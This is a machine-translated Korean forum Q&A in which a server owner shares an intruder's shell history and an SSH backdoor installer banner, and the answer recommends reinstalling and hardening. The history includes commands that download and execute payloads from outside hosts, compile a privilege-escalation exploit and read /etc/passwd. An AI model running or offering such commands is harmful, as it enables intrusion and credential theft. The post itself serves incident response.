VServer에서 SSH 백도어를 찾았습니다. 무엇을해야합니까?

어제 VServer에서 명령 기록을 확인했습니다. 의심스러운 줄이 여러 개 발견되었습니다.

  195  wget aridan.hol.es/sniffer.tgz
  196  tar xvf sniffer.tgz
  197  ls -a
  198  rm -rf sniffer.tgz
  199  rm -rf .sniff/
  200  cd /dev/shm
  201  ls -a
  202  mkdir " . "
  203  ls -a
  204  cd " . "/
  205  wget aridan.hol.es/sniffer.tgz
  206  tar xvf ar
  207  tar zxvf ar
  208  tar xvf sniffer.tgz
  209  cd .sniff/
  210  ls -a
  211  ./setup
  212  ls -a
  213  cd /var/tmp
  214  ls a-
  215  ls -a
  216  cd sy
  217  cd systemd-private-a5e12501dbc746eabcda29463d441b9e-openvpn\@server.servi                                                                             ce-HJ201p/
  218  ls -a
  219  pw
  220  pwd
  221  ls -a
  222  cd tmp/
  223  ls -a
  224  cd / .
  225  cd /dev/shm
  226  ls -a
  227  cd " . "/
  228  ls -a
  229  cd sniffer.tgz
  230  cd ..
  231  ls -a
  232  cd " . "/
  233  rm -rf sniffer.tgz
  234  cd .sniff/
  235  ls -a
  236  cd /var/tmp
  237  nproc
  238  w
  239  wget draqusor.hi2.ro/x; chmod +x *; ./x
  240  wget http://t1fix.com/local/ubuntu-2015.c; gcc ubuntu-2015.c -o ubuntu-20                                                                             15; chmod +x *; ./ubuntu-2015;
  241  id
  242  cd
  243  last
  244  cat /etc/passwd
  245  cd /dev/s
  246  cd /dev/shm/
  247  ls -a
  248  cd " . "/
  249  ls -a
  250  cd .sniff/
  251  ls -a
  252  nano se
  253  nano setup
  254  nano error_log
  255  nano error_log.2
  256  cat error_log.2
  257  ls -a
  258  nproc
  259  cd /var/tmp
  260  ls aรถ-
  261  ls -a
  262  rm -rf u*
  263  rm -rf x
  264  mkdir cache
  265  cd cache
  266  wget datafresh.org/md.tgz
  267  tat xvf md.tgz
  268  tar xvf md.tgz
  269  cd m
  270  cd d
  271  cd md
  272  ./a 5.196
  273  cat /proc/cpuinfo
  274  ./a 5.196
  275  ps -x
  276  cd /

특히 sniffer.tgz는 저에게 충격을주었습니다. 가상 머신을 설정하고이 tgz 아카이브를 다운로드했습니다. 나는 설정을 시작했고 나에게 다음 줄을 주었다.

-----------------------------------------------------------------------------------
     #OLDTEAM SSHD BACKDOOR v1.2 - OpenSSH 3.6p1
                                  PRIVATE VERSION
-----------------------------------------------------------------------------------


 CHECKING THIS SYSTEM

# GCC:                   [ FOUND ]
# G++:                   [ FOUND ]
# MAKE:                  [ FOUND ]
# OPENSSL DEVEL:         [ NOT FOUND ]

NOW TRYING TO INSTALL OPENSSL DEVEL

누구든지 이것을 제거하는 방법을 알고 있습니까?

이것이 당신이 가지고있는 모든 시스템에서해야 할 일 sniffer.tgz입니다 : Nuke Them From Orbit 즉시 , 새로 설치부터 시작하십시오. 즉, 깨끗한 백업이 있다고 가정하고 인터넷에 다시 연결하기 전에 시스템을 강화한다고 가정하면 시스템을 파괴하고, 클린을 재설치하고, 클린 백업 에서 데이터를로드합니다 .

이와 같이 맬웨어 나 해커가 시스템에 침입 할 때마다 시스템 구성 방식을 다시 분석하고 시스템과 동일한 단계를 반복 하지 않아야 합니다. 그러나 이것은 시스템이 아니기 때문에 당신은 제쳐두고 법 의학적 분석을 할 수있는 능력이 있으며, 이것이 유일한 서버 일 수 있으므로 가상 시스템을 파괴 하고 처음부터 다시 시작해야 할 때입니다 (위에서 언급했듯이).

(그리고 이것은 시스템에서 맬웨어가 발생하는 모든 상황에 적용됩니다. 이와 같은 것을 대체 할 여분의 하드웨어가없는 한 일반적으로 대부분의 사용자가 가지고 있지 않은 침해 된 시스템을 격리하고 법적으로 검사 할 수 있습니다. 시스템을 정리하고 다시 시작합니다.)

서버를 분석하지 않으면 실제로 무엇을 잘못했는지 말할 수는 없지만이 백도어는 설치 된 단순한 '프로그램'보다 시스템에서 더 깊을 수 있습니다. 또한 악의적 인 사용자가 이미 시스템에 백도어를 설치해야하므로 SSH, MySQL 루트 또는 다른 유형의 비밀번호에 관계없이 모든 비밀번호가 이제는 위반되어 더 이상 안전하지 않다고 가정 할 수 있습니다. 이 컴퓨터 시스템에 입력되었습니다). 모든 비밀번호 를 변경할 시간입니다 !

깨끗한 환경에서 백업 한 후 고려해야 할 단계 강화에 대한 몇 가지 기본 팁이 있습니다. 이것들은 주제를 훨씬 더 넓게 만들기 때문에 여기서는 자세히 다룰 수는 없지만 시스템을 보호하기 위해 강화 단계를 수행해야합니다.

1. 방화벽을 켜십시오 , 그리고 에만 열어야 포트에 액세스 할 수 있습니다 . ufw간단하게 존재하므로 사용합시다. sudo ufw enable. ( ufw환경에 맞게 올바르게 구성 하는 것은 다른 이야기이며이 질문의 범위를 넘어선 것입니다.)

2. 원격 SSH에 대한 액세스를 제한하십시오 . 이것이 항상 가능한 것은 아니지만, 자신이 소유 한 IP 주소를 식별하고 특히 방화벽에서 허용하는 것이 이상적입니다. 동적 주거용 IP 주소를 사용하는 경우이 단계를 건너 뛰십시오.

3. 서버에 SSH 접근을 봉쇄 하고, 단지 인증 SSH 키를 사용해야합니다 . 이런 방식으로 해커는 서버를 공격 할 수 없으며 암호를 시도하고 추측 할 수 있습니다. 적절한 개인 키를 추측하기가 훨씬 어렵습니다 (모두 무차별 공격을해야하기 때문에). 이것은 무차별 공격으로부터 보호하는 데 도움이됩니다.

4. 웹 사이트를 운영하는 경우, 사람들이 여가 시간에 물건을 업로드 / 실행할 수 없도록 권한을 잠그십시오 . 이 작업은 사이트마다 다르므로 여기서 더 많은 지침을 제공 할 수 없습니다 (불가능).

5. 또한 Joomla 또는 Wordpress 등을 사용하여 웹 사이트를 실행하는 경우 환경을 최신 상태로 유지하고 소프트웨어 제공 업체의 보안 취약성으로 패치하십시오 .

6. 가능 하면으로 인증하는 항목에 대해 2 단계 인증 (2FA) 방법을 설정, 구성 및 사용하십시오 . 다양한 응용 프로그램에 대한 2 단계 인증을위한 많은 솔루션이 있으며이 방법으로 다양한 응용 프로그램을 보호하는 것은이 게시물의 범위를 벗어나므로 솔루션을 선택하기 전에이 시점에서 조사해야합니다.

7. 설정에서 비밀번호 를 절대적으로 사용해야 하는 경우 적절한 비밀번호 관리자 (클라우드 기반 비밀번호는 반드시 좋은 선택은 아님)를 사용하고 각 개별 항목마다 다른 길이가 긴 (25 자 이상) 임의의 잊을 수없는 비밀번호를 사용하십시오. 비밀번호로 보안이 유지되므로 비밀번호 관리자가 권장합니다. (단, SSH 인증 등의 경우) 비밀번호를 사용하지 말고 가능한 경우 2FA를 사용하는 것이 좋습니다.

백도어가 하나 있으면 3 개가 더 있습니다. cron, php 또는 mysql 데이터를 조심하십시오. 모든 데이터가 손상 될 수 있습니다. 이 시점에서 암호와 해시가 모두 있다는 것을 기억하십시오. 따라서 다른 컴퓨터가 비슷하게 구성된 경우 해당 컴퓨터도 해킹했을 수 있습니다. 어려운 부분은 시작 방법을 파악하는 것입니다. 플러그인 / 테마 등에서 WordPress에 악성 코드가 있는지 확인하려면 권한을 확인하십시오. 간단한 대답은 없습니다. 많은 일을보고 있습니다.